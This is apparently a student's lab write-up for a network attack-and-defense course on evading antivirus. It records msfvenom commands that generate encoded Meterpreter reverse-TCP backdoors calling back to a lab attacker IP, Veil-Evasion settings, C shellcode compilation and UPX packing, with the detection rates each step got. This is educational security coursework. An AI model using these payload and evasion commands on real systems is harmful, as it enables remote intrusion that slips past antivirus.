• 20155330 《网络攻防》 Exp3 免杀原理与实践


    20155330 《网络攻防》 Exp3 免杀原理与实践

    基础问题回答

    1. 杀软是如何检测出恶意代码的?

      1. 基于特征码。先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码。
      2. 基于行为。杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等行为进行判断。
    2. 免杀是做什么?

      恶意代码避免杀毒软件查杀,从而实现入侵。

    3. 免杀的基本方法有哪些?

      • 对恶意代码进行加壳
      • 利用shellcode进行编码

    实践过程记录

    使用msf生成后门程序的检测

    • 将实验二中生成的后门程序上传到virscan中进行扫描,扫描信息及结果如下:


    • 根据扫描结果,有48%的杀软检测出了病毒。

    使用msf编码器生成meterpreter可执行文件

    • 使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=192.168.204.128 LPORT=5330 -f exe > 5330exp3.exe生成一次编码过的可执行文件
    • 再次对生成的程序进行扫描,扫描信息及结果如下:


    • 相较于直接生成后门程序,进行过编码后的程序依然有48%的杀软检测出病毒。
    • 将文件进行十次编码
    • 扫描文件,还是被那么多的杀软查杀到,那么多次编码好像也没有太大的作用。


    Veil-Evasion免杀平台

    • 在终端中使用veil-evasion命令打开该软件。
    • 输入
    use python/meterpreter/rev_tcp  //设置payload
    set LHOST 192.168.204.138    //设置反弹连接win-IP
    set port 443    //设置反弹端口443,默认为4444
    generate    //生成
    5330    //程序名
    1
    



    • 从路径/var/lib/veil-evasion/output/compiled找到相应程序,放到网站上扫描,结果如下:


    C语言调用Shellcode

    • 在kali主机下打开终端,执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Kali-IP LPORT=443 -f c,生成一个C语言数组。

    • 创建一个C文件(可用touch命令生成):MSSC_5330.c(免杀shellcode),将上面生成的数组copy到该文件下,并加入一个主函数。

    • 使用i686-w64-mingw32-g++ MSSC_5330.c -o MSSC_5330.exe命令将该C语言代码转换为一个可在64位windows系统下操作的可执行文件MSSC_5330.exe。
    • 放到网站上扫描一下,发现可以检测到病毒的杀软更少了。

    • 通过nc命令将可执行文件传到win7主机上,很快就被查杀了QAQ。

    加壳

    • 通过命令upx #需要加壳的文件名 -o #加壳后的文件名,生成程序。
    • 放到网站上扫描一下,emmmmm...没什么变化……

    • 再传到win7主机上,扫描一下。
    • 好像可以了?看看扫描日志。
    • 过了一会,又被查杀了TUT。

    离实战还缺些什么技术或步骤?

    应该是对编写免杀代码还不太了解,以目前的能力还只能依靠软件来生成代码,如果是纯手工的代码可能免杀的几率会更大一些。
    

    实践总结与体会

    通过不同的方式对恶意代码生成病毒程序有了一定的了解,可以简单制作出一些免杀后门。从而也了解到了目前我们所信赖的杀软其实还是存在着一些漏洞,假设将shellcode进行重新组合再加壳的话,免杀率应该还会再上升,从而通过杀软的扫描,入侵靶机。
  • 相关阅读:
    bash八大扩展一网打尽
    MySQL命令行导出数据库
    Windows 7上的DirectX 11.1
    把KlayGE嵌入其他GUI框架
    KlayGE的资源载入系统
    学习路漫漫……
    写下我的第一篇Post,呵呵
    今天学习:CSS中的类class和标识id选择符(.和#号)
    Remove Duplicates from Unsorted List
    2012 TODO List
  • 原文地址:https://www.cnblogs.com/ashin-kl/p/8783262.html
Copyright © 2020-2023  润新知